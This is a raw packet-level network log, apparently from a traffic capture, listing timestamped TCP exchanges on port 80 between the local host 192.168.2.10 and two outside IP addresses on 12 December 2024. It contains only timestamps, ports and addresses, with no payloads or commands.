                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.554227114 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.554313898 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.554900885 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.555773973 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.555896997 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.555979013 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.556941032 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.556953907 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.556963921 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.557025909 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.557039976 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.557914972 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.558244944 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.558321953 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.558936119 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.559951067 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.560015917 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.560024977 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.560079098 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.560100079 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.561014891 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.562187910 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.562284946 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.562702894 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.562815905 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.562894106 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.563343048 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.563455105 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.563716888 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.564028978 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.564644098 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.565053940 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.565171957 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.565758944 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.566070080 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.566081047 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.566159964 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.567132950 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.567166090 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.567912102 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.568155050 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.568161011 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.568242073 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.569155931 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.569165945 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.569252014 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.570095062 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.570244074 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.571204901 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.571316004 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.571742058 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.572144985 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.572268963 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.573194027 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.573205948 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.573215008 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.573301077 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.573314905 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.574242115 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.574606895 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.575195074 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.575278044 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.575721979 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.576224089 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.576301098 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.576457977 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.576529980 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.577198982 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.577378035 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.577486038 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.578217030 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.579267979 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.579279900 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.579289913 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.579319000 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.579334021 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.580262899 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.580358028 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.580413103 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.581402063 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.581412077 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.581454992 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.582300901 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.582668066 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.582762957 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.583383083 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.583394051 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.583477974 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.584331989 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.584479094 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.584549904 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.585328102 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.585786104 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.585860014 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.586504936 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.586812019 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.586888075 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.588175058 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.634766102 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.676043034 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.676206112 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.676314116 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.676357985 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.676405907 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.676556110 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.676604986 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.677407980 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.677463055 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.677558899 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.677598953 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.678273916 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.678322077 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.678441048 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.678479910 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.679301023 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.679354906 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.679635048 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.679680109 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.680320978 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.680375099 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.680680037 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.680726051 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.681343079 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.681389093 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.681514025 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.681587934 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.682224035 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.682284117 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.682612896 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.682658911 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.683151007 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.683192968 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.683502913 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.683542967 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.684206009 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.684549093 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.684598923 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.685081005 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.685133934 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.685436964 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.685477972 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.686078072 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.686120987 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.686573029 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.686615944 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.726599932 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.726722956 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.726845980 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.727093935 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.727227926 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.727329969 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.728209972 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.728318930 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.728444099 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.729172945 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.729183912 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.729288101 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.730178118 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.730190039 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.730281115 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.731141090 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.731405020 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.731496096 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.732201099 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.732611895 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.732700109 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.733192921 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.733205080 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.733295918 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.734211922 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.736566067 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.736577988 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.736589909 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.736602068 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.736614943 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.736684084 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.736716032 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.737330914 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.737343073 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.737442970 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.738280058 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.738569975 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.738650084 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.739342928 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.739403009 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.739510059 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.740282059 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.741177082 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.741341114 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.741362095 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.741425037 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.741476059 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.742309093 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.742366076 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.742446899 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.743360043 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.744102001 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.744463921 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.744476080 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.744554043 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.745395899 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.745661974 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.745758057 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.746373892 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.746598005 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.746675968 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.747380972 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.747777939 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.747978926 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.748393059 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.748918056 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.748991966 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.749403000 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.749903917 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.750242949 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.750497103 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.750509024 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.750576019 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.751461983 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.751627922 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.751704931 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.752448082 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.753498077 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.753508091 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.753519058 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.753578901 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.753590107 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.754486084 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.754690886 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.755161047 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.755512953 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.755553007 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.755639076 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.756514072 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.756814003 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.756932020 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.757570028 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.758907080 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.759022951 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.759633064 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.759670973 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.759763002 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.760050058 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.760310888 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.760723114 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.760808945 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.760876894 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.761636019 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.761745930 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.761868000 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.761965990 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.762640953 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.762758970 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.762862921 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.763659000 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.763930082 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.764039040 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.764705896 CET8049946185.81.68.147192.168.2.10
